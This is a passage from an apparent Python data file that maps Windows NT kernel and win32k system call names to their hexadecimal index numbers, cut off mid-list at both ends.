'NtCreateSymbolicLinkObject', # 0x56
'NtCreateThread', # 0x57
'NtCreateThreadEx', # 0x58
'NtCreateTimer', # 0x59
'NtCreateToken', # 0x5a
'NtCreateTransaction', # 0x5b
'NtCreateTransactionManager', # 0x5c
'NtCreateUserProcess', # 0x5d
'NtCreateWaitablePort', # 0x5e
'NtCreateWorkerFactory', # 0x5f
'NtDebugActiveProcess', # 0x60
'NtDebugContinue', # 0x61
'NtDelayExecution', # 0x62
'NtDeleteAtom', # 0x63
'NtDeleteBootEntry', # 0x64
'NtDeleteDriverEntry', # 0x65
'NtDeleteFile', # 0x66
'NtDeleteKey', # 0x67
'NtDeleteObjectAuditAlarm', # 0x68
'NtDeletePrivateNamespace', # 0x69
'NtDeleteValueKey', # 0x6a
'NtDeviceIoControlFile', # 0x6b
'NtDisableLastKnownGood', # 0x6c
'NtDisplayString', # 0x6d
'NtDrawText', # 0x6e
'NtDuplicateObject', # 0x6f
'NtDuplicateToken', # 0x70
'NtEnableLastKnownGood', # 0x71
'NtEnumerateBootEntries', # 0x72
'NtEnumerateDriverEntries', # 0x73
'NtEnumerateKey', # 0x74
'NtEnumerateSystemEnvironmentValuesEx', # 0x75
'NtEnumerateTransactionObject', # 0x76
'NtEnumerateValueKey', # 0x77
'NtExtendSection', # 0x78
'NtFilterToken', # 0x79
'NtFindAtom', # 0x7a
'NtFlushBuffersFile', # 0x7b
'NtFlushInstallUILanguage', # 0x7c
'NtFlushInstructionCache', # 0x7d
'NtFlushKey', # 0x7e
'NtFlushProcessWriteBuffers', # 0x7f
'NtFlushVirtualMemory', # 0x80
'NtFlushWriteBuffer', # 0x81
'NtFreeUserPhysicalPages', # 0x82
'NtFreeVirtualMemory', # 0x83
'NtFreezeRegistry', # 0x84
'NtFreezeTransactions', # 0x85
'NtFsControlFile', # 0x86
'NtGetContextThread', # 0x87
'NtGetCurrentProcessorNumber', # 0x88
'NtGetDevicePowerState', # 0x89
'NtGetMUIRegistryInfo', # 0x8a
'NtGetNextProcess', # 0x8b
'NtGetNextThread', # 0x8c
'NtGetNlsSectionPtr', # 0x8d
'NtGetNotificationResourceManager', # 0x8e
'NtGetPlugPlayEvent', # 0x8f
'NtGetWriteWatch', # 0x90
'NtImpersonateAnonymousToken', # 0x91
'NtImpersonateClientOfPort', # 0x92
'NtImpersonateThread', # 0x93
'NtInitializeNlsFiles', # 0x94
'NtInitializeRegistry', # 0x95
'NtInitiatePowerAction', # 0x96
'NtIsProcessInJob', # 0x97
'NtIsSystemResumeAutomatic', # 0x98
'NtIsUILanguageComitted', # 0x99
'NtListenPort', # 0x9a
'NtLoadDriver', # 0x9b
'NtLoadKey', # 0x9c
'NtLoadKey2', # 0x9d
'NtLoadKeyEx', # 0x9e
'NtLockFile', # 0x9f
'NtLockProductActivationKeys', # 0xa0
'NtLockRegistryKey', # 0xa1
'NtLockVirtualMemory', # 0xa2
'NtMakePermanentObject', # 0xa3
'NtMakeTemporaryObject', # 0xa4
'NtMapCMFModule', # 0xa5
'NtMapUserPhysicalPages', # 0xa6
'NtMapUserPhysicalPagesScatter', # 0xa7
'NtMapViewOfSection', # 0xa8
'NtModifyBootEntry', # 0xa9
'NtModifyDriverEntry', # 0xaa
'NtNotifyChangeDirectoryFile', # 0xab
'NtNotifyChangeKey', # 0xac
'NtNotifyChangeMultipleKeys', # 0xad
'NtNotifyChangeSession', # 0xae
'NtOpenDirectoryObject', # 0xaf
'NtOpenEnlistment', # 0xb0
'NtOpenEvent', # 0xb1
'NtOpenEventPair', # 0xb2
'NtOpenFile', # 0xb3
'NtOpenIoCompletion', # 0xb4
'NtOpenJobObject', # 0xb5
'NtOpenKey', # 0xb6
'NtOpenKeyEx', # 0xb7
'NtOpenKeyedEvent', # 0xb8
'NtOpenKeyTransacted', # 0xb9
'NtOpenKeyTransactedEx', # 0xba
'NtOpenMutant', # 0xbb
'NtOpenObjectAuditAlarm', # 0xbc
'NtOpenPrivateNamespace', # 0xbd
'NtOpenProcess', # 0xbe
'NtOpenProcessToken', # 0xbf
'NtOpenProcessTokenEx', # 0xc0
'NtOpenResourceManager', # 0xc1
'NtOpenSection', # 0xc2
'NtOpenSemaphore', # 0xc3
'NtOpenSession', # 0xc4
'NtOpenSymbolicLinkObject', # 0xc5
'NtOpenThread', # 0xc6
'NtOpenThreadToken', # 0xc7
'NtOpenThreadTokenEx', # 0xc8
'NtOpenTimer', # 0xc9
'NtOpenTransaction', # 0xca
'NtOpenTransactionManager', # 0xcb
'NtPlugPlayControl', # 0xcc
'NtPowerInformation', # 0xcd
'NtPrepareComplete', # 0xce
'NtPrepareEnlistment', # 0xcf
'NtPrePrepareComplete', # 0xd0
'NtPrePrepareEnlistment', # 0xd1
'NtPrivilegeCheck', # 0xd2
'NtPrivilegedServiceAuditAlarm', # 0xd3
'NtPrivilegeObjectAuditAlarm', # 0xd4
'NtPropagationComplete', # 0xd5
'NtPropagationFailed', # 0xd6
'NtProtectVirtualMemory', # 0xd7
'NtPulseEvent', # 0xd8
'NtQueryAttributesFile', # 0xd9
'NtQueryBootEntryOrder', # 0xda
'NtQueryBootOptions', # 0xdb
'NtQueryDebugFilterState', # 0xdc
'NtQueryDefaultLocale', # 0xdd
'NtQueryDefaultUILanguage', # 0xde
'NtQueryDirectoryFile', # 0xdf
'NtQueryDirectoryObject', # 0xe0
'NtQueryDriverEntryOrder', # 0xe1
'NtQueryEaFile', # 0xe2
'NtQueryEvent', # 0xe3
'NtQueryFullAttributesFile', # 0xe4
'NtQueryInformationAtom', # 0xe5
'NtQueryInformationEnlistment', # 0xe6
'NtQueryInformationFile', # 0xe7
'NtQueryInformationJobObject', # 0xe8
'NtQueryInformationPort', # 0xe9
'NtQueryInformationProcess', # 0xea
'NtQueryInformationResourceManager', # 0xeb
'NtQueryInformationThread', # 0xec
'NtQueryInformationToken', # 0xed
'NtQueryInformationTransaction', # 0xee
'NtQueryInformationTransactionManager', # 0xef
'NtQueryInformationWorkerFactory', # 0xf0
'NtQueryInstallUILanguage', # 0xf1
'NtQueryIntervalProfile', # 0xf2
'NtQueryIoCompletion', # 0xf3
'NtQueryKey', # 0xf4
'NtQueryLicenseValue', # 0xf5
'NtQueryMultipleValueKey', # 0xf6
'NtQueryMutant', # 0xf7
'NtQueryObject', # 0xf8
'NtQueryOpenSubKeys', # 0xf9
'NtQueryOpenSubKeysEx', # 0xfa
'NtQueryPerformanceCounter', # 0xfb
'NtQueryPortInformationProcess', # 0xfc
'NtQueryQuotaInformationFile', # 0xfd
'NtQuerySection', # 0xfe
'NtQuerySecurityAttributesToken', # 0xff
'NtQuerySecurityObject', # 0x100
'NtQuerySemaphore', # 0x101
'NtQuerySymbolicLinkObject', # 0x102
'NtQuerySystemEnvironmentValue', # 0x103
'NtQuerySystemEnvironmentValueEx', # 0x104
'NtQuerySystemInformation', # 0x105
'NtQuerySystemInformationEx', # 0x106
'NtQuerySystemTime', # 0x107
'NtQueryTimer', # 0x108
'NtQueryTimerResolution', # 0x109
'NtQueryValueKey', # 0x10a
'NtQueryVirtualMemory', # 0x10b
'NtQueryVolumeInformationFile', # 0x10c
'NtQueueApcThread', # 0x10d
'NtQueueApcThreadEx', # 0x10e
'NtRaiseException', # 0x10f
'NtRaiseHardError', # 0x110
'NtReadFile', # 0x111
'NtReadFileScatter', # 0x112
'NtReadOnlyEnlistment', # 0x113
'NtReadRequestData', # 0x114
'NtReadVirtualMemory', # 0x115
'NtRecoverEnlistment', # 0x116
'NtRecoverResourceManager', # 0x117
'NtRecoverTransactionManager', # 0x118
'NtRegisterProtocolAddressInformation', # 0x119
'NtRegisterThreadTerminatePort', # 0x11a
'NtReleaseKeyedEvent', # 0x11b
'NtReleaseMutant', # 0x11c
'NtReleaseSemaphore', # 0x11d
'NtReleaseWorkerFactoryWorker', # 0x11e
'NtRemoveIoCompletion', # 0x11f
'NtRemoveIoCompletionEx', # 0x120
'NtRemoveProcessDebug', # 0x121
'NtRenameKey', # 0x122
'NtRenameTransactionManager', # 0x123
'NtReplaceKey', # 0x124
'NtReplacePartitionUnit', # 0x125
'NtReplyPort', # 0x126
'NtReplyWaitReceivePort', # 0x127
'NtReplyWaitReceivePortEx', # 0x128
'NtReplyWaitReplyPort', # 0x129
'NtRequestPort', # 0x12a
'NtRequestWaitReplyPort', # 0x12b
'NtResetEvent', # 0x12c
'NtResetWriteWatch', # 0x12d
'NtRestoreKey', # 0x12e
'NtResumeProcess', # 0x12f
'NtResumeThread', # 0x130
'NtRollbackComplete', # 0x131
'NtRollbackEnlistment', # 0x132
'NtRollbackTransaction', # 0x133
'NtRollforwardTransactionManager', # 0x134
'NtSaveKey', # 0x135
'NtSaveKeyEx', # 0x136
'NtSaveMergedKeys', # 0x137
'NtSecureConnectPort', # 0x138
'NtSerializeBoot', # 0x139
'NtSetBootEntryOrder', # 0x13a
'NtSetBootOptions', # 0x13b
'NtSetContextThread', # 0x13c
'NtSetDebugFilterState', # 0x13d
'NtSetDefaultHardErrorPort', # 0x13e
'NtSetDefaultLocale', # 0x13f
'NtSetDefaultUILanguage', # 0x140
'NtSetDriverEntryOrder', # 0x141
'NtSetEaFile', # 0x142
'NtSetEvent', # 0x143
'NtSetEventBoostPriority', # 0x144
'NtSetHighEventPair', # 0x145
'NtSetHighWaitLowEventPair', # 0x146
'NtSetInformationDebugObject', # 0x147
'NtSetInformationEnlistment', # 0x148
'NtSetInformationFile', # 0x149
'NtSetInformationJobObject', # 0x14a
'NtSetInformationKey', # 0x14b
'NtSetInformationObject', # 0x14c
'NtSetInformationProcess', # 0x14d
'NtSetInformationResourceManager', # 0x14e
'NtSetInformationThread', # 0x14f
'NtSetInformationToken', # 0x150
'NtSetInformationTransaction', # 0x151
'NtSetInformationTransactionManager', # 0x152
'NtSetInformationWorkerFactory', # 0x153
'NtSetIntervalProfile', # 0x154
'NtSetIoCompletion', # 0x155
'NtSetIoCompletionEx', # 0x156
'NtSetLdtEntries', # 0x157
'NtSetLowEventPair', # 0x158
'NtSetLowWaitHighEventPair', # 0x159
'NtSetQuotaInformationFile', # 0x15a
'NtSetSecurityObject', # 0x15b
'NtSetSystemEnvironmentValue', # 0x15c
'NtSetSystemEnvironmentValueEx', # 0x15d
'NtSetSystemInformation', # 0x15e
'NtSetSystemPowerState', # 0x15f
'NtSetSystemTime', # 0x160
'NtSetThreadExecutionState', # 0x161
'NtSetTimer', # 0x162
'NtSetTimerEx', # 0x163
'NtSetTimerResolution', # 0x164
'NtSetUuidSeed', # 0x165
'NtSetValueKey', # 0x166
'NtSetVolumeInformationFile', # 0x167
'NtShutdownSystem', # 0x168
'NtShutdownWorkerFactory', # 0x169
'NtSignalAndWaitForSingleObject', # 0x16a
'NtSinglePhaseReject', # 0x16b
'NtStartProfile', # 0x16c
'NtStopProfile', # 0x16d
'NtSuspendProcess', # 0x16e
'NtSuspendThread', # 0x16f
'NtSystemDebugControl', # 0x170
'NtTerminateJobObject', # 0x171
'NtTerminateProcess', # 0x172
'NtTerminateThread', # 0x173
'NtTestAlert', # 0x174
'NtThawRegistry', # 0x175
'NtThawTransactions', # 0x176
'NtTraceControl', # 0x177
'NtTraceEvent', # 0x178
'NtTranslateFilePath', # 0x179
'NtUmsThreadYield', # 0x17a
'NtUnloadDriver', # 0x17b
'NtUnloadKey', # 0x17c
'NtUnloadKey2', # 0x17d
'NtUnloadKeyEx', # 0x17e
'NtUnlockFile', # 0x17f
'NtUnlockVirtualMemory', # 0x180
'NtUnmapViewOfSection', # 0x181
'NtVdmControl', # 0x182
'NtWaitForDebugEvent', # 0x183
'NtWaitForKeyedEvent', # 0x184
'NtWaitForMultipleObjects', # 0x185
'NtWaitForMultipleObjects32', # 0x186
'NtWaitForSingleObject', # 0x187
'NtWaitForWorkViaWorkerFactory', # 0x188
'NtWaitHighEventPair', # 0x189
'NtWaitLowEventPair', # 0x18a
'NtWorkerFactoryWorkerReady', # 0x18b
'NtWriteFile', # 0x18c
'NtWriteFileGather', # 0x18d
'NtWriteRequestData', # 0x18e
'NtWriteVirtualMemory', # 0x18f
'NtYieldExecution', # 0x190
],
[
'NtGdiAbortDoc', # 0x0
'NtGdiAbortPath', # 0x1
'NtGdiAddFontResourceW', # 0x2
'NtGdiAddRemoteFontToDC', # 0x3
'NtGdiAddFontMemResourceEx', # 0x4
'NtGdiRemoveMergeFont', # 0x5
'NtGdiAddRemoteMMInstanceToDC', # 0x6
'NtGdiAlphaBlend', # 0x7
'NtGdiAngleArc', # 0x8
'NtGdiAnyLinkedFonts', # 0x9
'NtGdiFontIsLinked', # 0xa
'NtGdiArcInternal', # 0xb
'NtGdiBeginGdiRendering', # 0xc
'NtGdiBeginPath', # 0xd
'NtGdiBitBlt', # 0xe
'NtGdiCancelDC', # 0xf
'NtGdiCheckBitmapBits', # 0x10
'NtGdiCloseFigure', # 0x11
'NtGdiClearBitmapAttributes', # 0x12
'NtGdiClearBrushAttributes', # 0x13
'NtGdiColorCorrectPalette', # 0x14
'NtGdiCombineRgn', # 0x15
'NtGdiCombineTransform', # 0x16
'NtGdiComputeXformCoefficients', # 0x17
'NtGdiConfigureOPMProtectedOutput', # 0x18
'NtGdiConvertMetafileRect', # 0x19
'NtGdiCreateBitmap', # 0x1a
'NtGdiCreateBitmapFromDxSurface', # 0x1b
'NtGdiCreateClientObj', # 0x1c
'NtGdiCreateColorSpace', # 0x1d
'NtGdiCreateColorTransform', # 0x1e
'NtGdiCreateCompatibleBitmap', # 0x1f
'NtGdiCreateCompatibleDC', # 0x20
'NtGdiCreateDIBBrush', # 0x21
'NtGdiCreateDIBitmapInternal', # 0x22
'NtGdiCreateDIBSection', # 0x23
'NtGdiCreateEllipticRgn', # 0x24
'NtGdiCreateHalftonePalette', # 0x25
'NtGdiCreateHatchBrushInternal', # 0x26
'NtGdiCreateMetafileDC', # 0x27
'NtGdiCreateOPMProtectedOutputs', # 0x28
'NtGdiCreatePaletteInternal', # 0x29
'NtGdiCreatePatternBrushInternal', # 0x2a
'NtGdiCreatePen', # 0x2b
'NtGdiCreateRectRgn', # 0x2c
'NtGdiCreateRoundRectRgn', # 0x2d
'NtGdiCreateServerMetaFile', # 0x2e
'NtGdiCreateSolidBrush', # 0x2f
'NtGdiD3dContextCreate', # 0x30
'NtGdiD3dContextDestroy', # 0x31
'NtGdiD3dContextDestroyAll', # 0x32
'NtGdiD3dValidateTextureStageState', # 0x33
'NtGdiD3dDrawPrimitives2', # 0x34
'NtGdiDdGetDriverState', # 0x35
'NtGdiDdAddAttachedSurface', # 0x36
'NtGdiDdAlphaBlt', # 0x37
'NtGdiDdAttachSurface', # 0x38
'NtGdiDdBeginMoCompFrame', # 0x39
'NtGdiDdBlt', # 0x3a
'NtGdiDdCanCreateSurface', # 0x3b
'NtGdiDdCanCreateD3DBuffer', # 0x3c
'NtGdiDdColorControl', # 0x3d
'NtGdiDdCreateDirectDrawObject', # 0x3e
'NtGdiDdCreateSurface', # 0x3f
'NtGdiDdCreateD3DBuffer', # 0x40
'NtGdiDdCreateMoComp', # 0x41
'NtGdiDdCreateSurfaceObject', # 0x42
'NtGdiDdDeleteDirectDrawObject', # 0x43
'NtGdiDdDeleteSurfaceObject', # 0x44
'NtGdiDdDestroyMoComp', # 0x45
'NtGdiDdDestroySurface', # 0x46
'NtGdiDdDestroyD3DBuffer', # 0x47
'NtGdiDdEndMoCompFrame', # 0x48
'NtGdiDdFlip', # 0x49
'NtGdiDdFlipToGDISurface', # 0x4a
'NtGdiDdGetAvailDriverMemory', # 0x4b
'NtGdiDdGetBltStatus', # 0x4c
'NtGdiDdGetDC', # 0x4d
'NtGdiDdGetDriverInfo', # 0x4e
'NtGdiDdGetDxHandle', # 0x4f
'NtGdiDdGetFlipStatus', # 0x50
'NtGdiDdGetInternalMoCompInfo', # 0x51
'NtGdiDdGetMoCompBuffInfo', # 0x52
'NtGdiDdGetMoCompGuids', # 0x53
'NtGdiDdGetMoCompFormats', # 0x54
'NtGdiDdGetScanLine', # 0x55
'NtGdiDdLock', # 0x56
'NtGdiDdLockD3D', # 0x57
'NtGdiDdQueryDirectDrawObject', # 0x58
'NtGdiDdQueryMoCompStatus', # 0x59
'NtGdiDdReenableDirectDrawObject', # 0x5a
'NtGdiDdReleaseDC', # 0x5b
'NtGdiDdRenderMoComp', # 0x5c
'NtGdiDdResetVisrgn', # 0x5d
'NtGdiDdSetColorKey', # 0x5e
'NtGdiDdSetExclusiveMode', # 0x5f
'NtGdiDdSetGammaRamp', # 0x60
'NtGdiDdCreateSurfaceEx', # 0x61
'NtGdiDdSetOverlayPosition', # 0x62
'NtGdiDdUnattachSurface', # 0x63
'NtGdiDdUnlock', # 0x64
'NtGdiDdUnlockD3D', # 0x65
'NtGdiDdUpdateOverlay', # 0x66
'NtGdiDdWaitForVerticalBlank', # 0x67
'NtGdiDvpCanCreateVideoPort', # 0x68
'NtGdiDvpColorControl', # 0x69
'NtGdiDvpCreateVideoPort', # 0x6a
'NtGdiDvpDestroyVideoPort', # 0x6b
'NtGdiDvpFlipVideoPort', # 0x6c
'NtGdiDvpGetVideoPortBandwidth', # 0x6d
'NtGdiDvpGetVideoPortField', # 0x6e
'NtGdiDvpGetVideoPortFlipStatus', # 0x6f
'NtGdiDvpGetVideoPortInputFormats', # 0x70
'NtGdiDvpGetVideoPortLine', # 0x71
'NtGdiDvpGetVideoPortOutputFormats', # 0x72
'NtGdiDvpGetVideoPortConnectInfo', # 0x73
'NtGdiDvpGetVideoSignalStatus', # 0x74
'NtGdiDvpUpdateVideoPort', # 0x75
'NtGdiDvpWaitForVideoPortSync', # 0x76
'NtGdiDvpAcquireNotification', # 0x77
'NtGdiDvpReleaseNotification', # 0x78
'NtGdiDxgGenericThunk', # 0x79
'NtGdiDeleteClientObj', # 0x7a
'NtGdiDeleteColorSpace', # 0x7b
'NtGdiDeleteColorTransform', # 0x7c
'NtGdiDeleteObjectApp', # 0x7d
'NtGdiDescribePixelFormat', # 0x7e
'NtGdiDestroyOPMProtectedOutput', # 0x7f
'NtGdiGetPerBandInfo', # 0x80
'NtGdiDoBanding', # 0x81
'NtGdiDoPalette', # 0x82
'NtGdiDrawEscape', # 0x83
'NtGdiEllipse', # 0x84
'NtGdiEnableEudc', # 0x85
'NtGdiEndDoc', # 0x86
'NtGdiEndGdiRendering', # 0x87
'NtGdiEndPage', # 0x88
'NtGdiEndPath', # 0x89
'NtGdiEnumFonts', # 0x8a
'NtGdiEnumObjects', # 0x8b
'NtGdiEqualRgn', # 0x8c
'NtGdiEudcLoadUnloadLink', # 0x8d
'NtGdiExcludeClipRect', # 0x8e
'NtGdiExtCreatePen', # 0x8f
'NtGdiExtCreateRegion', # 0x90
'NtGdiExtEscape', # 0x91
'NtGdiExtFloodFill', # 0x92
'NtGdiExtGetObjectW', # 0x93
'NtGdiExtSelectClipRgn', # 0x94
'NtGdiExtTextOutW', # 0x95
'NtGdiFillPath', # 0x96
'NtGdiFillRgn', # 0x97
'NtGdiFlattenPath', # 0x98
'NtGdiFlush', # 0x99
'NtGdiForceUFIMapping', # 0x9a
'NtGdiFrameRgn', # 0x9b
'NtGdiFullscreenControl', # 0x9c
'NtGdiGetAndSetDCDword', # 0x9d
'NtGdiGetAppClipBox', # 0x9e
'NtGdiGetBitmapBits', # 0x9f
'NtGdiGetBitmapDimension', # 0xa0
'NtGdiGetBoundsRect', # 0xa1
'NtGdiGetCertificate', # 0xa2
'NtGdiGetCertificateSize', # 0xa3
'NtGdiGetCharABCWidthsW', # 0xa4
'NtGdiGetCharacterPlacementW', # 0xa5
'NtGdiGetCharSet', # 0xa6
'NtGdiGetCharWidthW', # 0xa7
'NtGdiGetCharWidthInfo', # 0xa8
'NtGdiGetColorAdjustment', # 0xa9
'NtGdiGetColorSpaceforBitmap', # 0xaa
'NtGdiGetCOPPCompatibleOPMInformation', # 0xab
'NtGdiGetDCDword', # 0xac
'NtGdiGetDCforBitmap', # 0xad
'NtGdiGetDCObject', # 0xae
'NtGdiGetDCPoint', # 0xaf
'NtGdiGetDeviceCaps', # 0xb0
'NtGdiGetDeviceGammaRamp', # 0xb1
'NtGdiGetDeviceCapsAll', # 0xb2
'NtGdiGetDIBitsInternal', # 0xb3
'NtGdiGetETM', # 0xb4
'NtGdiGetEudcTimeStampEx', # 0xb5
'NtGdiGetFontData', # 0xb6
'NtGdiGetFontFileData', # 0xb7
'NtGdiGetFontFileInfo', # 0xb8
'NtGdiGetFontResourceInfoInternalW', # 0xb9
'NtGdiGetGlyphIndicesW', # 0xba
'NtGdiGetGlyphIndicesWInternal', # 0xbb
'NtGdiGetGlyphOutline', # 0xbc
'NtGdiGetOPMInformation', # 0xbd
'NtGdiGetKerningPairs', # 0xbe
'NtGdiGetLinkedUFIs', # 0xbf
'NtGdiGetMiterLimit', # 0xc0
'NtGdiGetMonitorID', # 0xc1
'NtGdiGetNearestColor', # 0xc2
'NtGdiGetNearestPaletteIndex', # 0xc3
'NtGdiGetObjectBitmapHandle', # 0xc4
'NtGdiGetOPMRandomNumber', # 0xc5
'NtGdiGetOutlineTextMetricsInternalW', # 0xc6
'NtGdiGetPath', # 0xc7
'NtGdiGetPixel', # 0xc8
'NtGdiGetRandomRgn', # 0xc9
'NtGdiGetRasterizerCaps', # 0xca
'NtGdiGetRealizationInfo', # 0xcb
'NtGdiGetRegionData', # 0xcc
'NtGdiGetRgnBox', # 0xcd
'NtGdiGetServerMetaFileBits', # 0xce
'NtGdiGetSpoolMessage', # 0xcf
'NtGdiGetStats', # 0xd0
'NtGdiGetStockObject', # 0xd1
'NtGdiGetStringBitmapW', # 0xd2
'NtGdiGetSuggestedOPMProtectedOutputArraySize', # 0xd3
'NtGdiGetSystemPaletteUse', # 0xd4
'NtGdiGetTextCharsetInfo', # 0xd5
'NtGdiGetTextExtent', # 0xd6
'NtGdiGetTextExtentExW', # 0xd7
'NtGdiGetTextFaceW', # 0xd8
'NtGdiGetTextMetricsW', # 0xd9
'NtGdiGetTransform', # 0xda
'NtGdiGetUFI', # 0xdb
'NtGdiGetEmbUFI', # 0xdc
'NtGdiGetUFIPathname', # 0xdd
'NtGdiGetEmbedFonts', # 0xde
'NtGdiChangeGhostFont', # 0xdf
'NtGdiAddEmbFontToDC', # 0xe0
'NtGdiGetFontUnicodeRanges', # 0xe1
'NtGdiGetWidthTable', # 0xe2
'NtGdiGradientFill', # 0xe3
'NtGdiHfontCreate', # 0xe4
'NtGdiIcmBrushInfo', # 0xe5
'NtGdiInit', # 0xe6
'NtGdiInitSpool', # 0xe7
'NtGdiIntersectClipRect', # 0xe8
'NtGdiInvertRgn', # 0xe9
'NtGdiLineTo', # 0xea
'NtGdiMakeFontDir', # 0xeb
'NtGdiMakeInfoDC', # 0xec
'NtGdiMaskBlt', # 0xed
'NtGdiModifyWorldTransform', # 0xee
'NtGdiMonoBitmap', # 0xef
'NtGdiMoveTo', # 0xf0
'NtGdiOffsetClipRgn', # 0xf1
'NtGdiOffsetRgn', # 0xf2
'NtGdiOpenDCW', # 0xf3
'NtGdiPatBlt', # 0xf4
'NtGdiPolyPatBlt', # 0xf5
'NtGdiPathToRegion', # 0xf6
'NtGdiPlgBlt', # 0xf7
'NtGdiPolyDraw', # 0xf8
'NtGdiPolyPolyDraw', # 0xf9
'NtGdiPolyTextOutW', # 0xfa
'NtGdiPtInRegion', # 0xfb
'NtGdiPtVisible', # 0xfc
'NtGdiQueryFonts', # 0xfd
'NtGdiQueryFontAssocInfo', # 0xfe
'NtGdiRectangle', # 0xff
'NtGdiRectInRegion', # 0x100
'NtGdiRectVisible', # 0x101
'NtGdiRemoveFontResourceW', # 0x102
'NtGdiRemoveFontMemResourceEx', # 0x103
'NtGdiResetDC', # 0x104
'NtGdiResizePalette', # 0x105
'NtGdiRestoreDC', # 0x106
'NtGdiRoundRect', # 0x107
'NtGdiSaveDC', # 0x108
'NtGdiScaleViewportExtEx', # 0x109
'NtGdiScaleWindowExtEx', # 0x10a
'NtGdiSelectBitmap', # 0x10b
'NtGdiSelectBrush', # 0x10c
'NtGdiSelectClipPath', # 0x10d
'NtGdiSelectFont', # 0x10e
'NtGdiSelectPen', # 0x10f
'NtGdiSetBitmapAttributes', # 0x110
'NtGdiSetBitmapBits', # 0x111
'NtGdiSetBitmapDimension', # 0x112
'NtGdiSetBoundsRect', # 0x113
'NtGdiSetBrushAttributes', # 0x114
'NtGdiSetBrushOrg', # 0x115
'NtGdiSetColorAdjustment', # 0x116
'NtGdiSetColorSpace', # 0x117
'NtGdiSetDeviceGammaRamp', # 0x118
'NtGdiSetDIBitsToDeviceInternal', # 0x119
'NtGdiSetFontEnumeration', # 0x11a
'NtGdiSetFontXform', # 0x11b
'NtGdiSetIcmMode', # 0x11c
'NtGdiSetLinkedUFIs', # 0x11d
'NtGdiSetMagicColors', # 0x11e
'NtGdiSetMetaRgn', # 0x11f
'NtGdiSetMiterLimit', # 0x120
'NtGdiGetDeviceWidth', # 0x121
'NtGdiMirrorWindowOrg', # 0x122
'NtGdiSetLayout', # 0x123
'NtGdiSetOPMSigningKeyAndSequenceNumbers', # 0x124
'NtGdiSetPixel', # 0x125
'NtGdiSetPixelFormat', # 0x126
'NtGdiSetRectRgn', # 0x127
'NtGdiSetSystemPaletteUse', # 0x128
'NtGdiSetTextJustification', # 0x129
'NtGdiSetVirtualResolution', # 0x12a
'NtGdiSetSizeDevice', # 0x12b
'NtGdiStartDoc', # 0x12c
'NtGdiStartPage', # 0x12d
'NtGdiStretchBlt', # 0x12e
'NtGdiStretchDIBitsInternal', # 0x12f
'NtGdiStrokeAndFillPath', # 0x130
'NtGdiStrokePath', # 0x131
'NtGdiSwapBuffers', # 0x132
'NtGdiTransformPoints', # 0x133
'NtGdiTransparentBlt', # 0x134
'NtGdiUnloadPrinterDriver', # 0x135
'NtGdiUnmapMemFont', # 0x136
'NtGdiUnrealizeObject', # 0x137
'NtGdiUpdateColors', # 0x138
'NtGdiWidenPath', # 0x139
'NtUserActivateKeyboardLayout', # 0x13a
'NtUserAddClipboardFormatListener', # 0x13b
'NtUserAlterWindowStyle', # 0x13c
'NtUserAssociateInputContext', # 0x13d
'NtUserAttachThreadInput', # 0x13e
'NtUserBeginPaint', # 0x13f
'NtUserBitBltSysBmp', # 0x140
'NtUserBlockInput', # 0x141
'NtUserBuildHimcList', # 0x142
'NtUserBuildHwndList', # 0x143
'NtUserBuildNameList', # 0x144
'NtUserBuildPropList', # 0x145
'NtUserCallHwnd', # 0x146
'NtUserCallHwndLock', # 0x147
'NtUserCallHwndOpt', # 0x148
'NtUserCallHwndParam', # 0x149
'NtUserCallHwndParamLock', # 0x14a
'NtUserCallMsgFilter', # 0x14b
'NtUserCallNextHookEx', # 0x14c
'NtUserCallNoParam', # 0x14d
'NtUserCallOneParam', # 0x14e
'NtUserCallTwoParam', # 0x14f
'NtUserChangeClipboardChain', # 0x150
'NtUserChangeDisplaySettings', # 0x151
'NtUserGetDisplayConfigBufferSizes', # 0x152
'NtUserSetDisplayConfig', # 0x153
'NtUserQueryDisplayConfig', # 0x154
'NtUserDisplayConfigGetDeviceInfo', # 0x155
'NtUserDisplayConfigSetDeviceInfo', # 0x156
'NtUserCheckAccessForIntegrityLevel', # 0x157
'NtUserCheckDesktopByThreadId', # 0x158
'NtUserCheckWindowThreadDesktop', # 0x159
'NtUserCheckMenuItem', # 0x15a
'NtUserChildWindowFromPointEx', # 0x15b
'NtUserClipCursor', # 0x15c
'NtUserCloseClipboard', # 0x15d
'NtUserCloseDesktop', # 0x15e
'NtUserCloseWindowStation', # 0x15f
'NtUserConsoleControl', # 0x160
'NtUserConvertMemHandle', # 0x161
'NtUserCopyAcceleratorTable', # 0x162
'NtUserCountClipboardFormats', # 0x163
'NtUserCreateAcceleratorTable', # 0x164
'NtUserCreateCaret', # 0x165
'NtUserCreateDesktopEx', # 0x166
'NtUserCreateInputContext', # 0x167
'NtUserCreateLocalMemHandle', # 0x168
'NtUserCreateWindowEx', # 0x169
'NtUserCreateWindowStation', # 0x16a
'NtUserDdeInitialize', # 0x16b
'NtUserDeferWindowPos', # 0x16c
'NtUserDefSetText', # 0x16d
'NtUserDeleteMenu', # 0x16e
'NtUserDestroyAcceleratorTable', # 0x16f
'NtUserDestroyCursor', # 0x170
'NtUserDestroyInputContext', # 0x171
'NtUserDestroyMenu', # 0x172
'NtUserDestroyWindow', # 0x173
'NtUserDisableThreadIme', # 0x174
'NtUserDispatchMessage', # 0x175
'NtUserDoSoundConnect', # 0x176
'NtUserDoSoundDisconnect', # 0x177
'NtUserDragDetect', # 0x178
'NtUserDragObject', # 0x179
'NtUserDrawAnimatedRects', # 0x17a
'NtUserDrawCaption', # 0x17b
'NtUserDrawCaptionTemp', # 0x17c
'NtUserDrawIconEx', # 0x17d
'NtUserDrawMenuBarTemp', # 0x17e
'NtUserEmptyClipboard', # 0x17f
'NtUserEnableMenuItem', # 0x180
'NtUserEnableScrollBar', # 0x181
'NtUserEndDeferWindowPosEx', # 0x182
'NtUserEndMenu', # 0x183
'NtUserEndPaint', # 0x184
'NtUserEnumDisplayDevices', # 0x185
'NtUserEnumDisplayMonitors', # 0x186
'NtUserEnumDisplaySettings', # 0x187
'NtUserEvent', # 0x188
'NtUserExcludeUpdateRgn', # 0x189
'NtUserFillWindow', # 0x18a
'NtUserFindExistingCursorIcon', # 0x18b
'NtUserFindWindowEx', # 0x18c
'NtUserFlashWindowEx', # 0x18d
'NtUserFrostCrashedWindow', # 0x18e
'NtUserGetAltTabInfo', # 0x18f
'NtUserGetAncestor', # 0x190
'NtUserGetAppImeLevel', # 0x191
'NtUserGetAsyncKeyState', # 0x192
'NtUserGetAtomName', # 0x193
'NtUserGetCaretBlinkTime', # 0x194
'NtUserGetCaretPos', # 0x195
